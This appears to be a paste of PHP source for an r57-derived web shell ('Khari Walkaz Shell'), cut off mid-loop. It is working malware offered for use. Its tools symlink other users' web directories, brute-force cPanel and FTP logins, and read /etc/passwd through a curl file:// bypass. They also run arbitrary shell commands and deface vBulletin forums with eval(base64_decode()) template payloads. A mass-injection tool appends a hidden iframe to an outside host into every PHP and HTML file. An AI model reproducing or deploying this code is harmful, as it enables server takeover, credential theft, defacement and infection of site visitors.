· 10 years ago · Mar 19, 2016, 11:33 AM
1<?php
2$head = '
3<html><head></script><link rel="shortcut icon" href="//i.imgur.com/WtiYeZa.jpg" />
4<script language="javascript">
5var rev = "fwd";
6function titlebar(val)
7{
8var msg = "::. Khari Walkaz Shell r57.::";
9var res = " ";
10var speed = 100;
11var pos = val;
12msg = "===> "+msg+" <===";
13var le = msg.length;
14if(rev == "fwd"){
15if(pos < le){
16pos = pos+1;
17scroll = msg.substr(0,pos);
18document.title = scroll;
19timer = window.setTimeout("titlebar("+pos+")",speed);
20}
21else{
22rev = "bwd";
23timer = window.setTimeout("titlebar("+pos+")",speed);
24}
25}
26else{
27if(pos > 0){
28pos = pos-1;
29var ale = le-pos;
30scrol = msg.substr(ale,le);
31document.title = scrol;
32timer = window.setTimeout("titlebar("+pos+")",speed);
33}
34else{
35rev = "fwd";
36timer = window.setTimeout("titlebar("+pos+")",speed);
37}
38}
39}
40titlebar(0);
41</script>
42<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
43<STYLE>
44body {
45font-family: Tahoma
46}
47tr {
48BORDER-RIGHT: #Black 1px solid;
49BORDER-TOP: Black 1px solid;
50BORDER-LEFT: Black 1px solid;
51BORDER-BOTTOM: #Black 1px solid;
52BORDER-COLOR: #008082;
53color: #d8d8d8;
54}
55td {
56BORDER-RIGHT: #Black 1px solid;
57BORDER-TOP: Black 1px solid;
58BORDER-LEFT: Black 1px solid;
59BORDER-BOTTOM: #Black 1px solid;
60BORDER-COLOR: #008082;
61color: #d8d8d8;
62}
63.table1 {
64BORDER: 0px;
65BORDER-COLOR: #008082;
66BACKGROUND-COLOR: Black;
67color: #d8d8d8;
68}
69.td1 {
70BORDER: 0px;
71BORDER-COLOR: #008082;
72font: 7pt Tahoma;
73color: #d8d8d8;
74}
75.tr1 {
76BORDER: 0px;
77BORDER-COLOR: #008082;
78color: #d8d8d8;
79}
80table {
81BORDER: Black 1px outset;
82BORDER-COLOR: #008082;
83BACKGROUND-COLOR: Black;
84color: #d8d8d8;
85}
86input {
87border : solid 1px;
88border-color : #2aff00 #2aff00 #2aff00 #2aff00;
89BACKGROUND-COLOR: Black;
90font: 8pt Tahoma;
91color: #d8d8d8;
92}
93select {
94BORDER-RIGHT: Black 1px solid;
95BORDER-TOP: #2aff00 1px solid;
96BORDER-LEFT: #2aff00 1px solid;
97BORDER-BOTTOM: Black 1px solid;
98BORDER-color: #d8d8d8;
99BACKGROUND-COLOR: Black;
100font: 8pt Tahoma;
101color: Red;
102}
103submit {
104BORDER: buttonhighlight 2px outset;
105BACKGROUND-COLOR: Black;
106width: 30%;
107color: #d8d8d8;
108}
109textarea {
110BORDER-RIGHT: Black 1px solid;
111BORDER-TOP: #2aff00 1px solid;
112BORDER-LEFT: #2aff00 1px solid;
113BORDER-BOTTOM: Black 1px solid;
114BORDER-COLOR: #008082;
115BACKGROUND-COLOR: Black;
116font: Fixedsys bold;
117color: #d8d8d8;
118}
119BODY {
120 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #d8d8d8; SCROLLBAR-SHADOW-color: #d8d8d8; SCROLLBAR-3DLIGHT-color: #d8d8d8; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #d8d8d8; SCROLLBAR-DARKSHADOW-color: #d8d8d8
121margin: 1px;
122color: Red;
123background-color: Black;
124}
125.main {
126margin : -287px 0px 0px -490px;
127border : #2aff00 solid 1px;
128BORDER-COLOR: #005d5e;
129}
130.tt {
131background-color: Black;
132}
133
134A:link {
135 COLOR: White; TEXT-DECORATION: none
136}
137A:visited {
138 COLOR: White; TEXT-DECORATION: none
139}
140A:hover {
141 color: Red; TEXT-DECORATION: none
142}
143A:active {
144 color: Red; TEXT-DECORATION: none
145}
146</STYLE><script language=\'javascript\'>
147function hide_div(id)
148{
149 document.getElementById(id).style.display = \'none\';
150 document.cookie=id+\'=0;\';
151}
152function show_div(id)
153{
154 document.getElementById(id).style.display = \'block\';
155 document.cookie=id+\'=1;\';
156}
157function change_divst(id)
158{
159 if (document.getElementById(id).style.display == \'none\')
160 show_div(id);
161 else
162 hide_div(id);
163}
164</script>';
165$info['security'] = false;
166$info['uname'] = "1ec47363cf1e60f632dd14139989b813";
167$info['pword'] = "4297f44b13955235245b2497399d7a93";
168$info['title'] = "TheSunOfVN";
169$info['ownsessions'] = false;
170foreach ($info as $key => $val) {
171 if (!isset($tacfg[$key])) $tacfg[$key] = $val;
172}
173if (!$tacfg['ownsessions']) {
174 session_name('txtauth');
175 session_start();
176}
177if (isset($_GET['logout']) || isset($_POST['logout'])) {
178 setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
179 if (!$tacfg['ownsessions']) {
180 $_SESSION = array();
181 session_destroy();
182 }
183 else $_SESSION['txtauthin'] = false;
184 system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']);
185}
186elseif (isset($_POST['login'])) {
187 $uname = md5($_POST['uname']);
188 $upass = md5($_POST['pword']);
189 if ($uname == $tacfg['uname'] && $upass == $tacfg['pword']) {
190 $_SESSION['txtauthin'] = true;
191 if ($_POST['rm']) {
192 setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
193 }
194 }
195 else $err = 'Login Failed !';
196 system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI']);
197}
198elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
199 if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
200 $_SESSION['txtauthin'] = true;
201 }
202 else $err = 'Login Failed !';
203}
204if ($info['security']) {
205if (!$_SESSION['txtauthin']) {
206@ini_restore("safe_mode");
207@ini_restore("open_basedir");
208@ini_restore("safe_mode_include_dir");
209@ini_restore("safe_mode_exec_dir");
210@ini_restore("disable_functions");
211@ini_restore("allow_url_fopen");
212@ini_set('error_log',NULL);
213@ini_set('log_errors',0);
214echo $head;
215?>
216<body><br><br><div style="font-size: 14pt;" align="center">Khari Walkaz R57 shell</div><hr width="300" size="1" noshade color="#cdcdcd"><p><p>
217<?
218if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
219else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
220if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
221?>
222<form name="txtauth" action="<?=$action?>" method="post">
223<div align="center">
224<table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
225<?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
226<?if (isset($tacfg['uname'])) {?>
227<tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
228<?}?>
229<tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
230<?if ($tacfg['allowrm']) {?>
231<tr><td align="left"><input type="submit" name="login" value="Login">
232</td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm"> Remmeber Me?</label></td></tr>
233<?} else {?>
234<tr><td colspan="2" align="center"><input type="submit" name="login" value="Login"></td></tr><?}?>
235</table></div></form><br><br><hr width="300" size="1" noshade color="#cdcdcd">
236<div class="smalltxt" align="center"><b>Edited by TheSunOfVN</b></div></body></html>
237<?
238 exit();
239 }
240}
241if (isset($_GET['ln'])) {
242$fp = fopen('users.txt','r');
243$fr = fread($fp,filesize('users.txt'));
244fclose($fp);
245preg_match_all('/(.+?):x:(.+?)/',$fr,$explode);
246foreach($explode[1] as $user) {
247system("ln -s /home/$user/public_html/ $user");
248}
249header("Location: ".$_SERVER['PHP_SELF']);
250}
251if (isset($_GET['brute'])) {
252?><html><head><meta http-equiv="Content-Language" content="en-us"></head>
253<title> BruteForcer v1.0 </title><style>
254body{margin:0px;font-style:normal;font-size:10px;color:#fff;font-family:Verdana,Arial;background-color:#000;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
255input,
256.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
257button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
258body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
259a:active { outline: none; }
260a:focus { -moz-outline-style: none; }
261table {
262 border: 2px dashed #fff;
263 background:#000;
264 color: #fff;
265 font-weight: bold;
266 font-family:"Comic Sans MS";
267 }
268</style><style type='text/css'>
269 <!--
270 A:link {text-decoration: none; color:#cccccc }
271 A:visited {text-decoration: none; color:#cccccc }
272 a:hover {text-decoration: none; color:Red}
273 -->
274</style>
275<?php
276@ini_set('memory_limit', 1000000000000);
277$connect_timeout=5;
278@set_time_limit(0);
279$submit = $_REQUEST['submit'];
280$users = $_REQUEST['users'];
281$pass = $_REQUEST['passwords'];
282$target = $_REQUEST['target'];
283$option = $_REQUEST['option'];
284$thesunofvn = $_GET['thesunofvn'];
285if($target == ''){
286$target = 'localhost';
287}
288?>
289<?php
290 print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
291<br><b><center><a href='?brute&thesunofvn=crack'> brute </a> -
292<a href='?brute&thesunofvn=listuser1'> Get users </a> -
293<a href='?brute&thesunofvn=bypass'> Bypass </a> -
294<font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]
295<br><br></center></td></tr></table>";
296if( $thesunofvn == 'crack'){
297@ini_set('memory_limit', 1000000000000);
298$connect_timeout=5;
299@set_time_limit(0);
300$submit = $_REQUEST['submit'];
301$users = $_REQUEST['users'];
302$pass = $_REQUEST['passwords'];
303$target = $_REQUEST['target'];
304$option = $_REQUEST['option'];
305if($target == ''){
306$target = 'localhost';
307}
308print " <div align='center'>
309<form method='post' style='border: 1px solid #000000'><br><br>
310<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
311<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
312<div align='center'><br>
313<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
314<tr><td align='center'><b>Username</b></td><td><p align='center'><b>Password</b></td></tr></table><p align='center'>
315<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
316<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>123pass
317pass123</textarea><br><br>
318<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
319<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
320</td></tr></table></td></tr></form><p align= 'left'>";
321?>
322<?php
323function ftp_check($host,$user,$pass,$timeout){
324$ch = curl_init();
325curl_setopt($ch, CURLOPT_URL, "ftp://$host");
326curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
327curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
328curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
329curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
330curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
331curl_setopt($ch, CURLOPT_FAILONERROR, 1);
332$data = curl_exec($ch);
333if ( curl_errno($ch) == 28 ) {
334print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
335exit;}
336elseif ( curl_errno($ch) == 0 ){
337if ($host == 'localhost') {
338$link = "ftp://$user:$pass@".$_SERVER['SERVER_ADDR'];
339} else {
340$link = "ftp://$user:$pass@".$host;
341}
342print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
343function cpanel_check($host,$user,$pass,$timeout){
344$ch = curl_init();
345curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
346curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
347curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
348curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
349curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
350curl_setopt($ch, CURLOPT_FAILONERROR, 1);
351$data = curl_exec($ch);
352if ( curl_errno($ch) == 28 ) {
353print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
354exit;}
355elseif ( curl_errno($ch) == 0 ){
356if ($host == 'localhost') {
357$link = "http://$user:$pass@".$_SERVER['SERVER_ADDR'].":2082";
358} else {
359$link = "http://$user:$pass@".$host.":2082";
360}
361print "<b><font color=Red> $user </font> | <font color=Red> $pass </font> [ <a href='$link'>$link</a> ]</b><br>";}curl_close($ch);}
362if(isset($submit) && !empty($submit)){
363$userlist = explode ("\n" , $users );
364$passlist = explode ("\n" , $pass );
365print "<b>[ Start : ]# Attacking ...</font></b><br><br>";
366foreach ($userlist as $user) {
367$_user = trim($user);
368foreach ($passlist as $password ) {
369$_pass = trim($password);
370if($option == "ftp"){
371ftp_check($target,$_user,$_pass,$connect_timeout);
372}
373if ($option == "cpanel")
374{
375cpanel_check($target,$_user,$_pass,$connect_timeout);
376}
377}
378}
379print "<br><b>[ Now : ]# F!nish3d ...</font></b><br>";
380}
381exit();
382}elseif ( $thesunofvn == 'listuser1'){
383echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
384echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="/etc/passwd"><input type="submit" name="hardstylez" value="grab !"></form>';
385$file = $_POST['file'];
386$level=0;
387if(!file_exists("file:"))
388@mkdir("file:");
389@chdir("file:");
390$level++;
391$hardstyle = @explode("/", $file);
392for($a=0;$a<count($hardstyle);$a++){
393 if(!empty($hardstyle[$a])){
394 if(!file_exists($hardstyle[$a]))
395 @mkdir($hardstyle[$a]);
396 @chdir($hardstyle[$a]);
397 $level++;
398 }
399}
400while($level--) chdir("..");
401$ch = curl_init();
402curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
403curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
404$result = curl_exec($ch);
405echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
406if ($result == FALSE)
407{ die("Failed!");
408} else {
409if (preg_match_all('/(.+?):x:(.+?)/',$result,$explode)) {
410foreach($explode[1] as $user) {echo $user."\n";}
411} else { echo $result;}
412}
413echo ' </textarea> </FONT>';
414curl_close($ch);
415print '</table>';
416exit();
417}
418elseif ( $thesunofvn == 'bypass'){echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%'bgColor=#303030
419borderColorLight=#966117 border=1><tr><td>";
420echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="100" value="'.htmlspecialchars($file).'">
421<input type="submit" name="hardstylez" value="get !"></form>';
422$file = $_POST['file'];
423$level=0;
424if(!file_exists("file:"))
425 @mkdir("file:");
426@chdir("file:");
427$level++;
428$hardstyle = @explode("/", $file);
429for($a=0;$a<count($hardstyle);$a++){
430 if(!empty($hardstyle[$a])){
431 if(!file_exists($hardstyle[$a]))
432 @mkdir($hardstyle[$a]);
433 @chdir($hardstyle[$a]);
434 $level++;
435 }
436}
437while($level--) chdir("..");
438$ch = curl_init();
439curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
440echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
441if(FALSE==curl_exec($ch))
442die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
443echo ' </textarea> </FONT>';
444curl_close($ch);
445print '</table>';}
446 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
447exit();
448}
449if(isset($_GET['tools'])) {
450if ($info['security']) echo $head."<body>Login As (<font color='#FF0000'>".$info['title']."</font>) <a href='?logout=1'>Logout</a></p>";
451else echo $head;
452echo "<center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#FFFFFF cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#FFFFFF border=1><tr><td width='70%'>
453<br><b><center>
454<a href='?tools&act=encoder'> Encoder </a> - <a href='?tools&act=fsbuff'> Buffer </a> - <a href='?tools&act=selfremove'> Self Remove </a> -
455<a href='?tools&act=massbrowsersploit'> Mass Code Injection </a> -
456<a href='?tools&act=fakelogin'> Fake Login </a> - <a href='?tools&act=deface'>Vbulletin Deface</a><br><br></center></td></tr></table>";
457$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
458$sf="<form method=post>";$ef="</form>";
459$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
460$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
461$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
462$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
463$sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
464error_reporting(0);
465set_magic_quotes_runtime(0);
466if(version_compare(phpversion(), '4.1.0') == -1)
467 {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
468 $_SERVER = &$HTTP_SERVER_VARS;
469 }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
470if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
471elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
472else{return $requ."?".$link."=".$val;}}
473function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid olive' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=olive>$delmtxt</td></tr></table></center>";}
474function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
475$nscmd=htmlspecialchars($scmd);print $nscmd;}
476elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
477$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
478elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
479while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
480print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
481ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
482ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
483print htmlspecialchars($pret);}}
484function input($type,$name,$value,$size)
485{if (empty($value)){print "<input type=$type name=$name size=$size>";}
486elseif(empty($name)&($size)){print "<input type=$type value=$value >";}
487elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
488else {print "<input type=$type name=$name value=$value size=$size >";}}
489function permcol($path){if (is_writable($path)){print "<font color=olive>";
490callperms($path); print "</font>";}
491elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>";
492callperms($path); print "</font>";}
493else {print "<font color=white>";callperms($path);}}
494if ($dlink=="dwld"){download($_REQUEST['dwld']);}
495function download($dwfile) {$size = filesize($dwfile);
496@header("Content-Type: application/force-download;name=$dwfile");
497@header("Content-Transfer-Encoding: binary");
498@header("Content-Length: $size");
499@header("Content-Disposition: attachment; filename=$dwfile");
500@header("Expires: 0");
501@header("Cache-Control: no-cache, must-revalidate");
502@header("Pragma: no-cache");
503@readfile($dwfile); exit;}
504$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
505$sf="<form method=post>";$ef="</form>";
506$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
507$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
508$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
509$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
510$sfnt="<font face=tahoma size=2 color=olive>";$efnt="</font>";
511print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "";
512if($_GET['act']=="encoder")
513{
514 echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
515 foreach(array("md5","crypt","sha1","crc32") as $v)
516 {
517 echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
518 }
519 echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
520 <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
521 <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
522 echo "<center>base64_decode - ";
523 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
524 else
525 {
526 $debase64 = base64_decode($encoder_input);
527 $debase64 = str_replace("\0","[0]",$debase64);
528 $a = explode("\r\n",$debase64);
529 $rows = count($a);
530 $debase64 = htmlspecialchars($debase64);
531 if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
532 else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
533 echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
534 }
535 echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
536 $c = strlen($encoder_input);
537 for($i=0;$i<$c;$i++)
538 {
539 $hex = dechex(ord($encoder_input[$i]));
540 if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
541 elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
542 }
543 echo "\" readonly><br></form>";
544?>
545</center><br><br><table border=0 align=center cellpadding=4><tr><td><center><b>Search milw0rm for MD5 hash</b></center></td><td>
546<center><b>Search md5encryption.com for MD5 or SHA1 hash</b></center></td><td><center><b>Search CsTeam for MD5 hash</b></center>
547</td></tr><tr><td><center><form target="_blank" action="http://www.milw0rm.com/cracker/search.php" method=POST>
548<input type=text size=40 name=hash> <input type=submit value="Submit"></form></center></td><td><center>
549<form target="_blank" action="http://www.md5encryption.com/?mod=decrypt" method=POST>
550<input type=text size=40 name=hash2word> <input type=submit value="Submit"></form>
551</center></td><td><center><form target="_blank" action="http://www.csthis.com/md5/index.php" method=POST>
552<input type=text size=40 name=h> <input type=submit value="Submit"></form></center></td></tr></table><br><center>
553<?php
554if (isset($_GET['hash']) && isset($_GET['wordlist']) && ($_GET['type'] == 'md5' || $_GET['type'] == 'sha1')) {
555 $type = $_GET['type'];
556 $hash = $_GET['hash'];
557 $count = 1;
558 $wordlist = file($_GET['wordlist']);
559 $words = count($wordlist);
560 foreach ($wordlist as $word) {
561 echo $count.' of '.$words.': '.$word.'<br>';
562 if ($hash == $type(rtrim($word))) {
563 echo '<font color=red>Great success! The password is: '.$word.'</font><br>';
564 exit;
565 }
566 ++$count;
567 }
568}
569}
570if($_GET['act']=="fsbuff")
571{
572 $arr_copy = $sess_data["copy"];
573 $arr_cut = $sess_data["cut"];
574 $arr = array_merge($arr_copy,$arr_cut);
575 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
576 else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
577}
578if($_GET['act']=="selfremove")
579{
580 if (($submit == $rndcode) and ($submit != ""))
581 {
582 if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
583 else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
584 }
585 else
586 {
587 if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
588 $rnd = rand(0,9).rand(0,9).rand(0,9);
589 echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>";
590 }
591}
592if($_GET['act']=="deface") {
593echo $head; echo "
594<center><h2 class='style1'>Vbulletin Deface</h2><div id=haberler align=left><form method=POST action=''>
595<p align=center class='style1'> </p><div class='style3' align=center>
596<span class='style2'>Host</span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbh value=localhost size='15' ></span>
597<font face='Arial' color='#ffffff'> Database Name:</font><span class='style1'><input type=text name=dbn size='15' ><br>Database User
598</span><font face='Arial' color='#ffffff'>:</font><span class='style1'><input type=text name=dbu size='15' ></span>
599<font face='Arial' color='#ffffff'> Database Pass: </font><span class='style1'><input type=text name=dbp size='16' ><br></span></div>
600<center class='style1'><textarea name=index rows='5' cols='33' >echo '_____ Khari Walkaz-VietNam _____';</textarea></center>
601<center class='style1'><input type=submit value='Deface It!!!' ></form></center></center></body></center>";
602$h4cker="[Edited] by Khari Walkaz";
603if (!empty($_POST['dbh']) && !empty($_POST['dbn']) && !empty($_POST['dbu']) && !empty($_POST['index']))
604{
605$dbh = $_POST['dbh'];
606$dbn = $_POST['dbn'];
607$dbu = $_POST['dbu'];
608$dbp = $_POST['dbp'];
609$index=str_replace("\'","'",$index);
610$set_index = "{\${eval(base64_decode(\'".base64_encode($index);
611//$set_index .= base64_encode("eval ('$index');");
612$set_index .= "\'))}}{\${exit()}}";
613mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
614mysql_select_db($dbn) or die(mysql_error());
615$fatal1 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='spacer_open'";
616$fatal2 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='FORUMHOME'";
617$fatal3 = "UPDATE style SET css='".$set_index."".$h4cker."', stylevars='', csscolors='', editorstyles=''";
618$result = mysql_query($fatal1) or die (mysql_error());
619$result2 = mysql_query($fatal2) or die (mysql_error());
620$result3 = mysql_query($fatal3) or die (mysql_error());
621if ($result && $result2 && $result3) echo "<center>Done!!!</center>";
622}
623}
624if($_GET['act']=="massbrowsersploit"){
625echo $head;
626?><body>Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br>
627<form action="" method=GET><input type=hidden name="masssploit" value="goahead"><input type=hidden name="act" value="massbrowsersploit">
628<table border=0><tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr>
629<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://omegakd.net" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr>
630<tr><td><input type=submit value="Inject Code"></td></tr></table></form>
631<?php
632if ($_GET['masssploit'] == 'goahead') {
633 if (is_dir($_GET['pathtomass'])) {
634 $lolinject = $_GET['injectthis'];
635 foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
636 $fp=fopen($injectj00,"a+");
637 if (fputs($fp,$lolinject)){
638 echo $injectj00.' was injected<br>';
639 } else {
640 echo '<font color=red>failed to inject '.$injectj00.'</font>';
641 }
642 }
643 foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) {
644 $fp=fopen($injectj00,"a+");
645 if (fputs($fp,$lolinject)){
646 echo $injectj00.' was injected<br>';
647 } else {
648 echo '<font color=red>failed to inject '.$injectj00.'</font>';
649 }
650 }
651 foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) {
652 $fp=fopen($injectj00,"a+");
653 if (fputs($fp,$lolinject)){
654 echo $injectj00.' was injected<br>';
655 } else {
